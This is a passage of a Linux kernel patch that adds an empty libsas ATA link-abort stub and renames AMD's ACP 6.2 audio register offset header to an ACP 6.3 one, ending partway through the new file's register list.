+@@ -88,6 +89,11 @@ static inline void sas_ata_end_eh(struct ata_port *ap)
+ {
+ }
+ 
++static inline void sas_ata_device_link_abort(struct domain_device *dev,
++					     bool force_reset)
++{
++}
++
+ static inline int sas_execute_ata_cmd(struct domain_device *device, u8 *fis,
+ 				      int force_phy_id)
+ {
+diff --git a/include/sound/acp62_chip_offset_byte.h b/include/sound/acp62_chip_offset_byte.h
+deleted file mode 100644
+index f03992f81168b..0000000000000
+--- a/include/sound/acp62_chip_offset_byte.h
++++ /dev/null
+@@ -1,444 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0+ */
+-/*
+- * AMD ACP 6.2 Register Documentation
+- *
+- * Copyright 2022 Advanced Micro Devices, Inc.
+- */
+-
+-#ifndef _acp_ip_OFFSET_HEADER
+-#define _acp_ip_OFFSET_HEADER
+-
+-/* Registers from ACP_DMA block */
+-#define ACP_DMA_CNTL_0                                0x0000000
+-#define ACP_DMA_CNTL_1                                0x0000004
+-#define ACP_DMA_CNTL_2                                0x0000008
+-#define ACP_DMA_CNTL_3                                0x000000C
+-#define ACP_DMA_CNTL_4                                0x0000010
+-#define ACP_DMA_CNTL_5                                0x0000014
+-#define ACP_DMA_CNTL_6                                0x0000018
+-#define ACP_DMA_CNTL_7                                0x000001C
+-#define ACP_DMA_DSCR_STRT_IDX_0                       0x0000020
+-#define ACP_DMA_DSCR_STRT_IDX_1                       0x0000024
+-#define ACP_DMA_DSCR_STRT_IDX_2                       0x0000028
+-#define ACP_DMA_DSCR_STRT_IDX_3                       0x000002C
+-#define ACP_DMA_DSCR_STRT_IDX_4                       0x0000030
+-#define ACP_DMA_DSCR_STRT_IDX_5                       0x0000034
+-#define ACP_DMA_DSCR_STRT_IDX_6                       0x0000038
+-#define ACP_DMA_DSCR_STRT_IDX_7                       0x000003C
+-#define ACP_DMA_DSCR_CNT_0                            0x0000040
+-#define ACP_DMA_DSCR_CNT_1                            0x0000044
+-#define ACP_DMA_DSCR_CNT_2                            0x0000048
+-#define ACP_DMA_DSCR_CNT_3                            0x000004C
+-#define ACP_DMA_DSCR_CNT_4                            0x0000050
+-#define ACP_DMA_DSCR_CNT_5                            0x0000054
+-#define ACP_DMA_DSCR_CNT_6                            0x0000058
+-#define ACP_DMA_DSCR_CNT_7                            0x000005C
+-#define ACP_DMA_PRIO_0                                0x0000060
+-#define ACP_DMA_PRIO_1                                0x0000064
+-#define ACP_DMA_PRIO_2                                0x0000068
+-#define ACP_DMA_PRIO_3                                0x000006C
+-#define ACP_DMA_PRIO_4                                0x0000070
+-#define ACP_DMA_PRIO_5                                0x0000074
+-#define ACP_DMA_PRIO_6                                0x0000078
+-#define ACP_DMA_PRIO_7                                0x000007C
+-#define ACP_DMA_CUR_DSCR_0                            0x0000080
+-#define ACP_DMA_CUR_DSCR_1                            0x0000084
+-#define ACP_DMA_CUR_DSCR_2                            0x0000088
+-#define ACP_DMA_CUR_DSCR_3                            0x000008C
+-#define ACP_DMA_CUR_DSCR_4                            0x0000090
+-#define ACP_DMA_CUR_DSCR_5                            0x0000094
+-#define ACP_DMA_CUR_DSCR_6                            0x0000098
+-#define ACP_DMA_CUR_DSCR_7                            0x000009C
+-#define ACP_DMA_CUR_TRANS_CNT_0                       0x00000A0
+-#define ACP_DMA_CUR_TRANS_CNT_1                       0x00000A4
+-#define ACP_DMA_CUR_TRANS_CNT_2                       0x00000A8
+-#define ACP_DMA_CUR_TRANS_CNT_3                       0x00000AC
+-#define ACP_DMA_CUR_TRANS_CNT_4                       0x00000B0
+-#define ACP_DMA_CUR_TRANS_CNT_5                       0x00000B4
+-#define ACP_DMA_CUR_TRANS_CNT_6                       0x00000B8
+-#define ACP_DMA_CUR_TRANS_CNT_7                       0x00000BC
+-#define ACP_DMA_ERR_STS_0                             0x00000C0
+-#define ACP_DMA_ERR_STS_1                             0x00000C4
+-#define ACP_DMA_ERR_STS_2                             0x00000C8
+-#define ACP_DMA_ERR_STS_3                             0x00000CC
+-#define ACP_DMA_ERR_STS_4                             0x00000D0
+-#define ACP_DMA_ERR_STS_5                             0x00000D4
+-#define ACP_DMA_ERR_STS_6                             0x00000D8
+-#define ACP_DMA_ERR_STS_7                             0x00000DC
+-#define ACP_DMA_DESC_BASE_ADDR                        0x00000E0
+-#define ACP_DMA_DESC_MAX_NUM_DSCR                     0x00000E4
+-#define ACP_DMA_CH_STS                                0x00000E8
+-#define ACP_DMA_CH_GROUP                              0x00000EC
+-#define ACP_DMA_CH_RST_STS                            0x00000F0
+-
+-/* Registers from ACP_AXI2AXIATU block */
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_1                0x0000C00
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_1                0x0000C04
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_2                0x0000C08
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_2                0x0000C0C
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_3                0x0000C10
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_3                0x0000C14
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_4                0x0000C18
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_4                0x0000C1C
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_5                0x0000C20
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_5                0x0000C24
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_6                0x0000C28
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_6                0x0000C2C
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_7                0x0000C30
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_7                0x0000C34
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_8                0x0000C38
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_8                0x0000C3C
+-#define ACPAXI2AXI_ATU_CTRL                           0x0000C40
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_9                0x0000C44
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_9                0x0000C48
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_10               0x0000C4C
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_10               0x0000C50
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_11               0x0000C54
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_11               0x0000C58
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_12               0x0000C5C
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_12               0x0000C60
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_13               0x0000C64
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_13               0x0000C68
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_14               0x0000C6C
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_14               0x0000C70
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_15               0x0000C74
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_15               0x0000C78
+-#define ACPAXI2AXI_ATU_PAGE_SIZE_GRP_16               0x0000C7C
+-#define ACPAXI2AXI_ATU_BASE_ADDR_GRP_16               0x0000C80
+-
+-/* Registers from ACP_CLKRST block */
+-#define ACP_SOFT_RESET                                0x0001000
+-#define ACP_CONTROL                                   0x0001004
+-#define ACP_STATUS                                    0x0001008
+-#define ACP_DYNAMIC_CG_MASTER_CONTROL                 0x0001010
+-#define ACP_ZSC_DSP_CTRL                              0x0001014
+-#define ACP_ZSC_STS                                   0x0001018
+-#define ACP_PGFSM_CONTROL                             0x0001024
+-#define ACP_PGFSM_STATUS                              0x0001028
+-#define ACP_CLKMUX_SEL                                0x000102C
+-
+-/* Registers from ACP_AON block */
+-#define ACP_PME_EN                                    0x0001400
+-#define ACP_DEVICE_STATE                              0x0001404
+-#define AZ_DEVICE_STATE                               0x0001408
+-#define ACP_PIN_CONFIG                                0x0001440
+-#define ACP_PAD_PULLUP_CTRL                           0x0001444
+-#define ACP_PAD_PULLDOWN_CTRL                         0x0001448
+-#define ACP_PAD_DRIVE_STRENGTH_CTRL                   0x000144C
+-#define ACP_PAD_SCHMEN_CTRL                           0x0001450
+-#define ACP_SW_PAD_KEEPER_EN                          0x0001454
+-#define ACP_SW_WAKE_EN                                0x0001458
+-#define ACP_I2S_WAKE_EN                               0x000145C
+-#define ACP_SW1_WAKE_EN                               0x0001460
+-
+-/* Registers from ACP_P1_MISC block */
+-#define ACP_EXTERNAL_INTR_ENB                         0x0001A00
+-#define ACP_EXTERNAL_INTR_CNTL                        0x0001A04
+-#define ACP_EXTERNAL_INTR_CNTL1                       0x0001A08
+-#define ACP_EXTERNAL_INTR_STAT                        0x0001A0C
+-#define ACP_EXTERNAL_INTR_STAT1                       0x0001A10
+-#define ACP_ERROR_STATUS                              0x0001A4C
+-#define ACP_P1_SW_I2S_ERROR_REASON                    0x0001A50
+-#define ACP_P1_SW_POS_TRACK_I2S_TX_CTRL               0x0001A6C
+-#define ACP_P1_SW_I2S_TX_DMA_POS                      0x0001A70
+-#define ACP_P1_SW_POS_TRACK_I2S_RX_CTRL               0x0001A74
+-#define ACP_P1_SW_I2S_RX_DMA_POS                      0x0001A78
+-#define ACP_P1_DMIC_I2S_GPIO_INTR_CTRL                0x0001A7C
+-#define ACP_P1_DMIC_I2S_GPIO_INTR_STATUS              0x0001A80
+-#define ACP_SCRATCH_REG_BASE_ADDR                     0x0001A84
+-#define ACP_P1_SW_POS_TRACK_BT_TX_CTRL                0x0001A88
+-#define ACP_P1_SW_BT_TX_DMA_POS                       0x0001A8C
+-#define ACP_P1_SW_POS_TRACK_HS_TX_CTRL                0x0001A90
+-#define ACP_P1_SW_HS_TX_DMA_POS                       0x0001A94
+-#define ACP_P1_SW_POS_TRACK_BT_RX_CTRL                0x0001A98
+-#define ACP_P1_SW_BT_RX_DMA_POS                       0x0001A9C
+-#define ACP_P1_SW_POS_TRACK_HS_RX_CTRL                0x0001AA0
+-#define ACP_P1_SW_HS_RX_DMA_POS                       0x0001AA4
+-
+-/* Registers from ACP_AUDIO_BUFFERS block */
+-#define ACP_I2S_RX_RINGBUFADDR                        0x0002000
+-#define ACP_I2S_RX_RINGBUFSIZE                        0x0002004
+-#define ACP_I2S_RX_LINKPOSITIONCNTR                   0x0002008
+-#define ACP_I2S_RX_FIFOADDR                           0x000200C
+-#define ACP_I2S_RX_FIFOSIZE                           0x0002010
+-#define ACP_I2S_RX_DMA_SIZE                           0x0002014
+-#define ACP_I2S_RX_LINEARPOSITIONCNTR_HIGH            0x0002018
+-#define ACP_I2S_RX_LINEARPOSITIONCNTR_LOW             0x000201C
+-#define ACP_I2S_RX_INTR_WATERMARK_SIZE                0x0002020
+-#define ACP_I2S_TX_RINGBUFADDR                        0x0002024
+-#define ACP_I2S_TX_RINGBUFSIZE                        0x0002028
+-#define ACP_I2S_TX_LINKPOSITIONCNTR                   0x000202C
+-#define ACP_I2S_TX_FIFOADDR                           0x0002030
+-#define ACP_I2S_TX_FIFOSIZE                           0x0002034
+-#define ACP_I2S_TX_DMA_SIZE                           0x0002038
+-#define ACP_I2S_TX_LINEARPOSITIONCNTR_HIGH            0x000203C
+-#define ACP_I2S_TX_LINEARPOSITIONCNTR_LOW             0x0002040
+-#define ACP_I2S_TX_INTR_WATERMARK_SIZE                0x0002044
+-#define ACP_BT_RX_RINGBUFADDR                         0x0002048
+-#define ACP_BT_RX_RINGBUFSIZE                         0x000204C
+-#define ACP_BT_RX_LINKPOSITIONCNTR                    0x0002050
+-#define ACP_BT_RX_FIFOADDR                            0x0002054
+-#define ACP_BT_RX_FIFOSIZE                            0x0002058
+-#define ACP_BT_RX_DMA_SIZE                            0x000205C
+-#define ACP_BT_RX_LINEARPOSITIONCNTR_HIGH             0x0002060
+-#define ACP_BT_RX_LINEARPOSITIONCNTR_LOW              0x0002064
+-#define ACP_BT_RX_INTR_WATERMARK_SIZE                 0x0002068
+-#define ACP_BT_TX_RINGBUFADDR                         0x000206C
+-#define ACP_BT_TX_RINGBUFSIZE                         0x0002070
+-#define ACP_BT_TX_LINKPOSITIONCNTR                    0x0002074
+-#define ACP_BT_TX_FIFOADDR                            0x0002078
+-#define ACP_BT_TX_FIFOSIZE                            0x000207C
+-#define ACP_BT_TX_DMA_SIZE                            0x0002080
+-#define ACP_BT_TX_LINEARPOSITIONCNTR_HIGH             0x0002084
+-#define ACP_BT_TX_LINEARPOSITIONCNTR_LOW              0x0002088
+-#define ACP_BT_TX_INTR_WATERMARK_SIZE                 0x000208C
+-#define ACP_HS_RX_RINGBUFADDR                         0x0002090
+-#define ACP_HS_RX_RINGBUFSIZE                         0x0002094
+-#define ACP_HS_RX_LINKPOSITIONCNTR                    0x0002098
+-#define ACP_HS_RX_FIFOADDR                            0x000209C
+-#define ACP_HS_RX_FIFOSIZE                            0x00020A0
+-#define ACP_HS_RX_DMA_SIZE                            0x00020A4
+-#define ACP_HS_RX_LINEARPOSITIONCNTR_HIGH             0x00020A8
+-#define ACP_HS_RX_LINEARPOSITIONCNTR_LOW              0x00020AC
+-#define ACP_HS_RX_INTR_WATERMARK_SIZE                 0x00020B0
+-#define ACP_HS_TX_RINGBUFADDR                         0x00020B4
+-#define ACP_HS_TX_RINGBUFSIZE                         0x00020B8
+-#define ACP_HS_TX_LINKPOSITIONCNTR                    0x00020BC
+-#define ACP_HS_TX_FIFOADDR                            0x00020C0
+-#define ACP_HS_TX_FIFOSIZE                            0x00020C4
+-#define ACP_HS_TX_DMA_SIZE                            0x00020C8
+-#define ACP_HS_TX_LINEARPOSITIONCNTR_HIGH             0x00020CC
+-#define ACP_HS_TX_LINEARPOSITIONCNTR_LOW              0x00020D0
+-#define ACP_HS_TX_INTR_WATERMARK_SIZE                 0x00020D4
+-
+-/* Registers from ACP_I2S_TDM block */
+-#define ACP_I2STDM_IER                                0x0002400
+-#define ACP_I2STDM_IRER                               0x0002404
+-#define ACP_I2STDM_RXFRMT                             0x0002408
+-#define ACP_I2STDM_ITER                               0x000240C
+-#define ACP_I2STDM_TXFRMT                             0x0002410
+-#define ACP_I2STDM0_MSTRCLKGEN                        0x0002414
+-#define ACP_I2STDM1_MSTRCLKGEN                        0x0002418
+-#define ACP_I2STDM2_MSTRCLKGEN                        0x000241C
+-#define ACP_I2STDM_REFCLKGEN                          0x0002420
+-
+-/* Registers from ACP_BT_TDM block */
+-#define ACP_BTTDM_IER                                 0x0002800
+-#define ACP_BTTDM_IRER                                0x0002804
+-#define ACP_BTTDM_RXFRMT                              0x0002808
+-#define ACP_BTTDM_ITER                                0x000280C
+-#define ACP_BTTDM_TXFRMT                              0x0002810
+-#define ACP_HSTDM_IER                                 0x0002814
+-#define ACP_HSTDM_IRER                                0x0002818
+-#define ACP_HSTDM_RXFRMT                              0x000281C
+-#define ACP_HSTDM_ITER                                0x0002820
+-#define ACP_HSTDM_TXFRMT                              0x0002824
+-
+-/* Registers from ACP_WOV block */
+-#define ACP_WOV_PDM_ENABLE                            0x0002C04
+-#define ACP_WOV_PDM_DMA_ENABLE                        0x0002C08
+-#define ACP_WOV_RX_RINGBUFADDR                        0x0002C0C
+-#define ACP_WOV_RX_RINGBUFSIZE                        0x0002C10
+-#define ACP_WOV_RX_LINKPOSITIONCNTR                   0x0002C14
+-#define ACP_WOV_RX_LINEARPOSITIONCNTR_HIGH            0x0002C18
+-#define ACP_WOV_RX_LINEARPOSITIONCNTR_LOW             0x0002C1C
+-#define ACP_WOV_RX_INTR_WATERMARK_SIZE                0x0002C20
+-#define ACP_WOV_PDM_FIFO_FLUSH                        0x0002C24
+-#define ACP_WOV_PDM_NO_OF_CHANNELS                    0x0002C28
+-#define ACP_WOV_PDM_DECIMATION_FACTOR                 0x0002C2C
+-#define ACP_WOV_PDM_VAD_CTRL                          0x0002C30
+-#define ACP_WOV_WAKE                                  0x0002C54
+-#define ACP_WOV_BUFFER_STATUS                         0x0002C58
+-#define ACP_WOV_MISC_CTRL                             0x0002C5C
+-#define ACP_WOV_CLK_CTRL                              0x0002C60
+-#define ACP_PDM_VAD_DYNAMIC_CLK_GATING_EN             0x0002C64
+-#define ACP_WOV_ERROR_STATUS_REGISTER                 0x0002C68
+-#define ACP_PDM_CLKDIV                                0x0002C6C
+-
+-/* Registers from ACP_P1_AUDIO_BUFFERS block */
+-#define ACP_P1_I2S_RX_RINGBUFADDR                     0x0003A00
+-#define ACP_P1_I2S_RX_RINGBUFSIZE                     0x0003A04
+-#define ACP_P1_I2S_RX_LINKPOSITIONCNTR                0x0003A08
+-#define ACP_P1_I2S_RX_FIFOADDR                        0x0003A0C
+-#define ACP_P1_I2S_RX_FIFOSIZE                        0x0003A10
+-#define ACP_P1_I2S_RX_DMA_SIZE                        0x0003A14
+-#define ACP_P1_I2S_RX_LINEARPOSITIONCNTR_HIGH         0x0003A18
+-#define ACP_P1_I2S_RX_LINEARPOSITIONCNTR_LOW          0x0003A1C
+-#define ACP_P1_I2S_RX_INTR_WATERMARK_SIZE             0x0003A20
+-#define ACP_P1_I2S_TX_RINGBUFADDR                     0x0003A24
+-#define ACP_P1_I2S_TX_RINGBUFSIZE                     0x0003A28
+-#define ACP_P1_I2S_TX_LINKPOSITIONCNTR                0x0003A2C
+-#define ACP_P1_I2S_TX_FIFOADDR                        0x0003A30
+-#define ACP_P1_I2S_TX_FIFOSIZE                        0x0003A34
+-#define ACP_P1_I2S_TX_DMA_SIZE                        0x0003A38
+-#define ACP_P1_I2S_TX_LINEARPOSITIONCNTR_HIGH         0x0003A3C
+-#define ACP_P1_I2S_TX_LINEARPOSITIONCNTR_LOW          0x0003A40
+-#define ACP_P1_I2S_TX_INTR_WATERMARK_SIZE             0x0003A44
+-#define ACP_P1_BT_RX_RINGBUFADDR                      0x0003A48
+-#define ACP_P1_BT_RX_RINGBUFSIZE                      0x0003A4C
+-#define ACP_P1_BT_RX_LINKPOSITIONCNTR                 0x0003A50
+-#define ACP_P1_BT_RX_FIFOADDR                         0x0003A54
+-#define ACP_P1_BT_RX_FIFOSIZE                         0x0003A58
+-#define ACP_P1_BT_RX_DMA_SIZE                         0x0003A5C
+-#define ACP_P1_BT_RX_LINEARPOSITIONCNTR_HIGH          0x0003A60
+-#define ACP_P1_BT_RX_LINEARPOSITIONCNTR_LOW           0x0003A64
+-#define ACP_P1_BT_RX_INTR_WATERMARK_SIZE              0x0003A68
+-#define ACP_P1_BT_TX_RINGBUFADDR                      0x0003A6C
+-#define ACP_P1_BT_TX_RINGBUFSIZE                      0x0003A70
+-#define ACP_P1_BT_TX_LINKPOSITIONCNTR                 0x0003A74
+-#define ACP_P1_BT_TX_FIFOADDR                         0x0003A78
+-#define ACP_P1_BT_TX_FIFOSIZE                         0x0003A7C
+-#define ACP_P1_BT_TX_DMA_SIZE                         0x0003A80
+-#define ACP_P1_BT_TX_LINEARPOSITIONCNTR_HIGH          0x0003A84
+-#define ACP_P1_BT_TX_LINEARPOSITIONCNTR_LOW           0x0003A88
+-#define ACP_P1_BT_TX_INTR_WATERMARK_SIZE              0x0003A8C
+-#define ACP_P1_HS_RX_RINGBUFADDR                      0x0003A90
+-#define ACP_P1_HS_RX_RINGBUFSIZE                      0x0003A94
+-#define ACP_P1_HS_RX_LINKPOSITIONCNTR                 0x0003A98
+-#define ACP_P1_HS_RX_FIFOADDR                         0x0003A9C
+-#define ACP_P1_HS_RX_FIFOSIZE                         0x0003AA0
+-#define ACP_P1_HS_RX_DMA_SIZE                         0x0003AA4
+-#define ACP_P1_HS_RX_LINEARPOSITIONCNTR_HIGH          0x0003AA8
+-#define ACP_P1_HS_RX_LINEARPOSITIONCNTR_LOW           0x0003AAC
+-#define ACP_P1_HS_RX_INTR_WATERMARK_SIZE              0x0003AB0
+-#define ACP_P1_HS_TX_RINGBUFADDR                      0x0003AB4
+-#define ACP_P1_HS_TX_RINGBUFSIZE                      0x0003AB8
+-#define ACP_P1_HS_TX_LINKPOSITIONCNTR                 0x0003ABC
+-#define ACP_P1_HS_TX_FIFOADDR                         0x0003AC0
+-#define ACP_P1_HS_TX_FIFOSIZE                         0x0003AC4
+-#define ACP_P1_HS_TX_DMA_SIZE                         0x0003AC8
+-#define ACP_P1_HS_TX_LINEARPOSITIONCNTR_HIGH          0x0003ACC
+-#define ACP_P1_HS_TX_LINEARPOSITIONCNTR_LOW           0x0003AD0
+-#define ACP_P1_HS_TX_INTR_WATERMARK_SIZE              0x0003AD4
+-
+-/* Registers from ACP_SCRATCH block */
+-#define ACP_SCRATCH_REG_0                             0x0010000
+-#define ACP_SCRATCH_REG_1                             0x0010004
+-#define ACP_SCRATCH_REG_2                             0x0010008
+-#define ACP_SCRATCH_REG_3                             0x001000C
+-#define ACP_SCRATCH_REG_4                             0x0010010
+-#define ACP_SCRATCH_REG_5                             0x0010014
+-#define ACP_SCRATCH_REG_6                             0x0010018
+-#define ACP_SCRATCH_REG_7                             0x001001C
+-#define ACP_SCRATCH_REG_8                             0x0010020
+-#define ACP_SCRATCH_REG_9                             0x0010024
+-#define ACP_SCRATCH_REG_10                            0x0010028
+-#define ACP_SCRATCH_REG_11                            0x001002C
+-#define ACP_SCRATCH_REG_12                            0x0010030
+-#define ACP_SCRATCH_REG_13                            0x0010034
+-#define ACP_SCRATCH_REG_14                            0x0010038
+-#define ACP_SCRATCH_REG_15                            0x001003C
+-#define ACP_SCRATCH_REG_16                            0x0010040
+-#define ACP_SCRATCH_REG_17                            0x0010044
+-#define ACP_SCRATCH_REG_18                            0x0010048
+-#define ACP_SCRATCH_REG_19                            0x001004C
+-#define ACP_SCRATCH_REG_20                            0x0010050
+-#define ACP_SCRATCH_REG_21                            0x0010054
+-#define ACP_SCRATCH_REG_22                            0x0010058
+-#define ACP_SCRATCH_REG_23                            0x001005C
+-#define ACP_SCRATCH_REG_24                            0x0010060
+-#define ACP_SCRATCH_REG_25                            0x0010064
+-#define ACP_SCRATCH_REG_26                            0x0010068
+-#define ACP_SCRATCH_REG_27                            0x001006C
+-#define ACP_SCRATCH_REG_28                            0x0010070
+-#define ACP_SCRATCH_REG_29                            0x0010074
+-#define ACP_SCRATCH_REG_30                            0x0010078
+-#define ACP_SCRATCH_REG_31                            0x001007C
+-#define ACP_SCRATCH_REG_32                            0x0010080
+-#define ACP_SCRATCH_REG_33                            0x0010084
+-#define ACP_SCRATCH_REG_34                            0x0010088
+-#define ACP_SCRATCH_REG_35                            0x001008C
+-#define ACP_SCRATCH_REG_36                            0x0010090
+-#define ACP_SCRATCH_REG_37                            0x0010094
+-#define ACP_SCRATCH_REG_38                            0x0010098
+-#define ACP_SCRATCH_REG_39                            0x001009C
+-#define ACP_SCRATCH_REG_40                            0x00100A0
+-#define ACP_SCRATCH_REG_41                            0x00100A4
+-#define ACP_SCRATCH_REG_42                            0x00100A8
+-#define ACP_SCRATCH_REG_43                            0x00100AC
+-#define ACP_SCRATCH_REG_44                            0x00100B0
+-#define ACP_SCRATCH_REG_45                            0x00100B4
+-#define ACP_SCRATCH_REG_46                            0x00100B8
+-#define ACP_SCRATCH_REG_47                            0x00100BC
+-#define ACP_SCRATCH_REG_48                            0x00100C0
+-#define ACP_SCRATCH_REG_49                            0x00100C4
+-#define ACP_SCRATCH_REG_50                            0x00100C8
+-#define ACP_SCRATCH_REG_51                            0x00100CC
+-#define ACP_SCRATCH_REG_52                            0x00100D0
+-#define ACP_SCRATCH_REG_53                            0x00100D4
+-#define ACP_SCRATCH_REG_54                            0x00100D8
+-#define ACP_SCRATCH_REG_55                            0x00100DC
+-#define ACP_SCRATCH_REG_56                            0x00100E0
+-#define ACP_SCRATCH_REG_57                            0x00100E4
+-#define ACP_SCRATCH_REG_58                            0x00100E8
+-#define ACP_SCRATCH_REG_59                            0x00100EC
+-#define ACP_SCRATCH_REG_60                            0x00100F0
+-#define ACP_SCRATCH_REG_61                            0x00100F4
+-#define ACP_SCRATCH_REG_62                            0x00100F8
+-#define ACP_SCRATCH_REG_63                            0x00100FC
+-#define ACP_SCRATCH_REG_64                            0x0010100
+-#define ACP_SCRATCH_REG_65                            0x0010104
+-#define ACP_SCRATCH_REG_66                            0x0010108
+-#define ACP_SCRATCH_REG_67                            0x001010C
+-#define ACP_SCRATCH_REG_68                            0x0010110
+-#define ACP_SCRATCH_REG_69                            0x0010114
+-#define ACP_SCRATCH_REG_70                            0x0010118
+-#define ACP_SCRATCH_REG_71                            0x001011C
+-#define ACP_SCRATCH_REG_72                            0x0010120
+-#define ACP_SCRATCH_REG_73                            0x0010124
+-#define ACP_SCRATCH_REG_74                            0x0010128
+-#define ACP_SCRATCH_REG_75                            0x001012C
+-#define ACP_SCRATCH_REG_76                            0x0010130
+-#define ACP_SCRATCH_REG_77                            0x0010134
+-#define ACP_SCRATCH_REG_78                            0x0010138
+-#define ACP_SCRATCH_REG_79                            0x001013C
+-#define ACP_SCRATCH_REG_80                            0x0010140
+-#define ACP_SCRATCH_REG_81                            0x0010144
+-#define ACP_SCRATCH_REG_82                            0x0010148
+-#define ACP_SCRATCH_REG_83                            0x001014C
+-#define ACP_SCRATCH_REG_84                            0x0010150
+-#define ACP_SCRATCH_REG_85                            0x0010154
+-#define ACP_SCRATCH_REG_86                            0x0010158
+-#define ACP_SCRATCH_REG_87                            0x001015C
+-#define ACP_SCRATCH_REG_88                            0x0010160
+-#define ACP_SCRATCH_REG_89                            0x0010164
+-#define ACP_SCRATCH_REG_90                            0x0010168
+-#define ACP_SCRATCH_REG_91                            0x001016C
+-#define ACP_SCRATCH_REG_92                            0x0010170
+-#define ACP_SCRATCH_REG_93                            0x0010174
+-#define ACP_SCRATCH_REG_94                            0x0010178
+-#define ACP_SCRATCH_REG_95                            0x001017C
+-#define ACP_SCRATCH_REG_96                            0x0010180
+-#define ACP_SCRATCH_REG_97                            0x0010184
+-#define ACP_SCRATCH_REG_98                            0x0010188
+-#define ACP_SCRATCH_REG_99                            0x001018C
+-#define ACP_SCRATCH_REG_100                           0x0010190
+-#define ACP_SCRATCH_REG_101                           0x0010194
+-#define ACP_SCRATCH_REG_102                           0x0010198
+-#define ACP_SCRATCH_REG_103                           0x001019C
+-#define ACP_SCRATCH_REG_104                           0x00101A0
+-#define ACP_SCRATCH_REG_105                           0x00101A4
+-#define ACP_SCRATCH_REG_106                           0x00101A8
+-#define ACP_SCRATCH_REG_107                           0x00101AC
+-#define ACP_SCRATCH_REG_108                           0x00101B0
+-#define ACP_SCRATCH_REG_109                           0x00101B4
+-#define ACP_SCRATCH_REG_110                           0x00101B8
+-#define ACP_SCRATCH_REG_111                           0x00101BC
+-#define ACP_SCRATCH_REG_112                           0x00101C0
+-#define ACP_SCRATCH_REG_113                           0x00101C4
+-#define ACP_SCRATCH_REG_114                           0x00101C8
+-#define ACP_SCRATCH_REG_115                           0x00101CC
+-#define ACP_SCRATCH_REG_116                           0x00101D0
+-#define ACP_SCRATCH_REG_117                           0x00101D4
+-#define ACP_SCRATCH_REG_118                           0x00101D8
+-#define ACP_SCRATCH_REG_119                           0x00101DC
+-#define ACP_SCRATCH_REG_120                           0x00101E0
+-#define ACP_SCRATCH_REG_121                           0x00101E4
+-#define ACP_SCRATCH_REG_122                           0x00101E8
+-#define ACP_SCRATCH_REG_123                           0x00101EC
+-#define ACP_SCRATCH_REG_124                           0x00101F0
+-#define ACP_SCRATCH_REG_125                           0x00101F4
+-#define ACP_SCRATCH_REG_126                           0x00101F8
+-#define ACP_SCRATCH_REG_127                           0x00101FC
+-#define ACP_SCRATCH_REG_128                           0x0010200
+-#endif
+diff --git a/include/sound/acp63_chip_offset_byte.h b/include/sound/acp63_chip_offset_byte.h
+new file mode 100644
+index 0000000000000..b02d0467c3cf4
+--- /dev/null
++++ b/include/sound/acp63_chip_offset_byte.h
+@@ -0,0 +1,444 @@
++/* SPDX-License-Identifier: GPL-2.0+ */
++/*
++ * AMD ACP 6.3 Register Documentation
++ *
++ * Copyright 2022 Advanced Micro Devices, Inc.
++ */
++
++#ifndef _acp_ip_OFFSET_HEADER
++#define _acp_ip_OFFSET_HEADER
++
++/* Registers from ACP_DMA block */
++#define ACP_DMA_CNTL_0                                0x0000000
++#define ACP_DMA_CNTL_1                                0x0000004
++#define ACP_DMA_CNTL_2                                0x0000008
++#define ACP_DMA_CNTL_3                                0x000000C
++#define ACP_DMA_CNTL_4                                0x0000010
++#define ACP_DMA_CNTL_5                                0x0000014
++#define ACP_DMA_CNTL_6                                0x0000018
++#define ACP_DMA_CNTL_7                                0x000001C
++#define ACP_DMA_DSCR_STRT_IDX_0                       0x0000020
++#define ACP_DMA_DSCR_STRT_IDX_1                       0x0000024
++#define ACP_DMA_DSCR_STRT_IDX_2                       0x0000028
++#define ACP_DMA_DSCR_STRT_IDX_3                       0x000002C
++#define ACP_DMA_DSCR_STRT_IDX_4                       0x0000030
++#define ACP_DMA_DSCR_STRT_IDX_5                       0x0000034
++#define ACP_DMA_DSCR_STRT_IDX_6                       0x0000038
++#define ACP_DMA_DSCR_STRT_IDX_7                       0x000003C
++#define ACP_DMA_DSCR_CNT_0                            0x0000040
++#define ACP_DMA_DSCR_CNT_1                            0x0000044
++#define ACP_DMA_DSCR_CNT_2                            0x0000048
++#define ACP_DMA_DSCR_CNT_3                            0x000004C
++#define ACP_DMA_DSCR_CNT_4                            0x0000050
++#define ACP_DMA_DSCR_CNT_5                            0x0000054
++#define ACP_DMA_DSCR_CNT_6                            0x0000058
++#define ACP_DMA_DSCR_CNT_7                            0x000005C
++#define ACP_DMA_PRIO_0                                0x0000060
++#define ACP_DMA_PRIO_1                                0x0000064
++#define ACP_DMA_PRIO_2                                0x0000068
++#define ACP_DMA_PRIO_3                                0x000006C
